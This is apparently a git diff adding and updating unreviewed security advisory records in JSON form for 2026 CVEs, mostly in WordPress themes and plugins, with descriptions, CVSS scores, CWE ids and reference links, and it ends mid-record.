"CVE-2025-67982" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Urna urna allows PHP Local File Inclusion.This issue affects Urna: from n/a through <= 2.5.12.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67982" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/urna/vulnerability/wordpress-urna-theme-2-5-12-local-file-inclusion-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mxq6-8688-3xc6/GHSA-mxq6-8688-3xc6.json b/advisories/unreviewed/2026/02/GHSA-mxq6-8688-3xc6/GHSA-mxq6-8688-3xc6.json index c3535010509ac..a2974bcc5c76e 100644 --- a/advisories/unreviewed/2026/02/GHSA-mxq6-8688-3xc6/GHSA-mxq6-8688-3xc6.json +++ b/advisories/unreviewed/2026/02/GHSA-mxq6-8688-3xc6/GHSA-mxq6-8688-3xc6.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mxq6-8688-3xc6", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25388" ], "details": "Missing Authorization vulnerability in scripteo Ads Pro ap-plugin-scripteo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ads Pro: from n/a through <= 5.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:20Z" diff --git a/advisories/unreviewed/2026/02/GHSA-p2m5-3j38-g6mj/GHSA-p2m5-3j38-g6mj.json b/advisories/unreviewed/2026/02/GHSA-p2m5-3j38-g6mj/GHSA-p2m5-3j38-g6mj.json new file mode 100644 index 0000000000000..bb3a6228621b4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p2m5-3j38-g6mj/GHSA-p2m5-3j38-g6mj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p2m5-3j38-g6mj", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26095" + ], + "details": "Incorrect Permission Assignment for Critical Resource in Owl opds 2.2.0.4 allows File Manipulation via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26095" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26095" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p2vq-xhgq-wqqr/GHSA-p2vq-xhgq-wqqr.json b/advisories/unreviewed/2026/02/GHSA-p2vq-xhgq-wqqr/GHSA-p2vq-xhgq-wqqr.json new file mode 100644 index 0000000000000..b07042c21d506 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p2vq-xhgq-wqqr/GHSA-p2vq-xhgq-wqqr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p2vq-xhgq-wqqr", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69370" + ], + "details": "Deserialization of Untrusted Data vulnerability in ThemeGoods Capella capella allows Object Injection.This issue affects Capella: from n/a through <= 2.5.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69370" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/capella/vulnerability/wordpress-capella-theme-2-5-5-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p3w5-jrj2-m9r6/GHSA-p3w5-jrj2-m9r6.json b/advisories/unreviewed/2026/02/GHSA-p3w5-jrj2-m9r6/GHSA-p3w5-jrj2-m9r6.json new file mode 100644 index 0000000000000..14805d3626a8d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p3w5-jrj2-m9r6/GHSA-p3w5-jrj2-m9r6.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p3w5-jrj2-m9r6", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68069" + ], + "details": "Missing Authorization vulnerability in wpWax Directorist directorist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Directorist: from n/a through <= 8.5.10.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68069" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/directorist/vulnerability/wordpress-directorist-plugin-8-5-6-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p52x-wxj2-j8jr/GHSA-p52x-wxj2-j8jr.json b/advisories/unreviewed/2026/02/GHSA-p52x-wxj2-j8jr/GHSA-p52x-wxj2-j8jr.json new file mode 100644 index 0000000000000..13e6a6e75955e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p52x-wxj2-j8jr/GHSA-p52x-wxj2-j8jr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p52x-wxj2-j8jr", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68043" + ], + "details": "Missing Authorization vulnerability in LottieFiles LottieFiles lottiefiles allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LottieFiles: from n/a through <= 3.0.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68043" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/lottiefiles/vulnerability/wordpress-lottiefiles-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p57f-h2f5-67v8/GHSA-p57f-h2f5-67v8.json b/advisories/unreviewed/2026/02/GHSA-p57f-h2f5-67v8/GHSA-p57f-h2f5-67v8.json new file mode 100644 index 0000000000000..17e678a98a6f5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p57f-h2f5-67v8/GHSA-p57f-h2f5-67v8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p57f-h2f5-67v8", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69406" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX FreightCo freightco allows PHP Local File Inclusion.This issue affects FreightCo: from n/a through <= 1.1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69406" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/freightco/vulnerability/wordpress-freightco-theme-1-1-7-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p69v-gqh4-hg9p/GHSA-p69v-gqh4-hg9p.json b/advisories/unreviewed/2026/02/GHSA-p69v-gqh4-hg9p/GHSA-p69v-gqh4-hg9p.json new file mode 100644 index 0000000000000..427c5e54b17a7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p69v-gqh4-hg9p/GHSA-p69v-gqh4-hg9p.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p69v-gqh4-hg9p", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69329" + ], + "details": "Deserialization of Untrusted Data vulnerability in Jthemes Prestige prestige allows Object Injection.This issue affects Prestige: from n/a through < 1.4.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69329" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/prestige/vulnerability/wordpress-prestige-theme-1-4-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p95v-rww3-j83p/GHSA-p95v-rww3-j83p.json b/advisories/unreviewed/2026/02/GHSA-p95v-rww3-j83p/GHSA-p95v-rww3-j83p.json new file mode 100644 index 0000000000000..ac3ac157c81b6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p95v-rww3-j83p/GHSA-p95v-rww3-j83p.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p95v-rww3-j83p", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69299" + ], + "details": "Server-Side Request Forgery (SSRF) vulnerability in Laborator Oxygen oxygen allows Server Side Request Forgery.This issue affects Oxygen: from n/a through <= 6.0.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69299" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/oxygen/vulnerability/wordpress-oxygen-theme-6-0-8-server-side-request-forgery-ssrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json b/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json new file mode 100644 index 0000000000000..7c8bdd909df0a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pf6r-4hv7-pr4f", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67991" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in vanquish User Extra Fields wp-user-extra-fields allows Reflected XSS.This issue affects User Extra Fields: from n/a through <= 16.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67991" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-user-extra-fields/vulnerability/wordpress-user-extra-fields-plugin-16-8-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json b/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json new file mode 100644 index 0000000000000..5eedab98e0b85 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pfgm-6983-f589", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-70831" + ], + "details": "A Remote Code Execution (RCE) vulnerability was found in Smanga 3.2.7 in the /php/path/rescan.php interface. The application fails to properly sanitize user-supplied input in the mediaId parameter before using it in a system shell command. This allows an unauthenticated attacker to inject arbitrary operating system commands, leading to complete server compromise.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70831" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve/issues/5" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json b/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json new file mode 100644 index 0000000000000..0b31d56c005f6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pg4q-7rh5-52c9", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-27502" + ], + "details": "SVXportal version 2.5 and prior contain a reflected cross-site scripting vulnerability in log.php via the search query parameter. The application embeds the unsanitized parameter value directly into an HTML input value attribute, allowing an unauthenticated remote attacker to inject and execute arbitrary JavaScript in a victim's browser if the victim visits a crafted URL. This can be used to steal session data, perform actions as the victim, or modify displayed content.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27502" + }, + { + "type": "WEB", + "url": "https://github.com/sa2blv/SVXportal/blob/master/log.php" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/svxportal-log-php-search-reflected-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json b/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json new file mode 100644 index 0000000000000..90471ced8be2b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pj5w-7j3v-9wwv", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68854" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in harman79 ID Arrays id-arrays allows DOM-Based XSS.This issue affects ID Arrays: from n/a through <= 2.1.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68854" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/id-arrays/vulnerability/wordpress-id-arrays-plugin-2-1-2-post-based-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json b/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json new file mode 100644 index 0000000000000..cb1f59587984f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pjx3-8fqj-x6hr", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67972" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fox-themes Prague prague-plugins allows Reflected XSS.This issue affects Prague: from n/a through <= 2.2.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67972" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/prague-plugins/vulnerability/wordpress-prague-plugin-2-2-8-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pm2j-978g-6g85/GHSA-pm2j-978g-6g85.json b/advisories/unreviewed/2026/02/GHSA-pm2j-978g-6g85/GHSA-pm2j-978g-6g85.json new file mode 100644 index 0000000000000..6c96badd3d93d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pm2j-978g-6g85/GHSA-pm2j-978g-6g85.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pm2j-978g-6g85", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26096" + ], + "details": "Incorrect Permission Assignment for Critical Resource in Owl opds 2.2.0.4 allows File Manipulation via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26096" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26096" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pm69-54qr-cgv7/GHSA-pm69-54qr-cgv7.json b/advisories/unreviewed/2026/02/GHSA-pm69-54qr-cgv7/GHSA-pm69-54qr-cgv7.json new file mode 100644 index 0000000000000..b268fc9cad612 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pm69-54qr-cgv7/GHSA-pm69-54qr-cgv7.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pm69-54qr-cgv7", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22346" + ], + "details": "Deserialization of Untrusted Data vulnerability in A WP Life Slider Responsive Slideshow – Image slider, Gallery slideshow slider-responsive-slideshow allows Object Injection.This issue affects Slider Responsive Slideshow – Image slider, Gallery slideshow: from n/a through <= 1.5.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22346" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/slider-responsive-slideshow/vulnerability/wordpress-slider-responsive-slideshow-image-slider-gallery-slideshow-plugin-1-5-4-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json b/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json new file mode 100644 index 0000000000000..61cca68f9347e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmgj-wpmq-6xx5", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24955" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fox-themes Whizz Plugins whizz-plugins allows Reflected XSS.This issue affects Whizz Plugins: from n/a through <= 1.9.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24955" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/whizz-plugins/vulnerability/wordpress-whizz-plugins-plugin-1-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json b/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json new file mode 100644 index 0000000000000..e7cfd796fb0c4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pq2q-m7vr-7342", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69391" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3themes Diamond diamond allows Reflected XSS.This issue affects Diamond: from n/a through <= 2.4.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69391" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/diamond/vulnerability/wordpress-diamond-theme-2-4-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pq9c-2qch-jgmw/GHSA-pq9c-2qch-jgmw.json b/advisories/unreviewed/2026/02/GHSA-pq9c-2qch-jgmw/GHSA-pq9c-2qch-jgmw.json new file mode 100644 index 0000000000000..bb633a6907ac6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pq9c-2qch-jgmw/GHSA-pq9c-2qch-jgmw.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pq9c-2qch-jgmw", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69405" + ], + "details": "Deserialization of Untrusted Data vulnerability in ThemeREX Lorem Ipsum | Books & Media Store lorem-ipsum-books-media-store allows Object Injection.This issue affects Lorem Ipsum | Books & Media Store: from n/a through <= 1.2.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69405" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/lorem-ipsum-books-media-store/vulnerability/wordpress-lorem-ipsum-books-media-store-theme-1-2-6-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-prpx-gw6q-vpv2/GHSA-prpx-gw6q-vpv2.json b/advisories/unreviewed/2026/02/GHSA-prpx-gw6q-vpv2/GHSA-prpx-gw6q-vpv2.json new file mode 100644 index 0000000000000..14e3738dff4bc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-prpx-gw6q-vpv2/GHSA-prpx-gw6q-vpv2.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-prpx-gw6q-vpv2", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2024-51915" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Stored XSS.This issue affects LiteSpeed Cache: from n/a through <= 6.5.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51915" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/litespeed-cache/vulnerability/wordpress-litespeed-cache-plugin-6-5-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pw6c-r98f-r37w/GHSA-pw6c-r98f-r37w.json b/advisories/unreviewed/2026/02/GHSA-pw6c-r98f-r37w/GHSA-pw6c-r98f-r37w.json new file mode 100644 index 0000000000000..d06810af22929 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pw6c-r98f-r37w/GHSA-pw6c-r98f-r37w.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pw6c-r98f-r37w", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67997" + ], + "details": "Deserialization of Untrusted Data vulnerability in BoldThemes Travelicious travelicious allows Object Injection.This issue affects Travelicious: from n/a through < 1.6.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67997" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/travelicious/vulnerability/wordpress-travelicious-theme-1-6-7-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-px76-q5p2-wfgw/GHSA-px76-q5p2-wfgw.json b/advisories/unreviewed/2026/02/GHSA-px76-q5p2-wfgw/GHSA-px76-q5p2-wfgw.json index 2a07450d4e15f..2c482be3f30ab 100644 --- a/advisories/unreviewed/2026/02/GHSA-px76-q5p2-wfgw/GHSA-px76-q5p2-wfgw.json +++ b/advisories/unreviewed/2026/02/GHSA-px76-q5p2-wfgw/GHSA-px76-q5p2-wfgw.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-px76-q5p2-wfgw", - "modified": "2026-02-19T18:31:53Z", + "modified": "2026-02-20T18:31:28Z", "published": 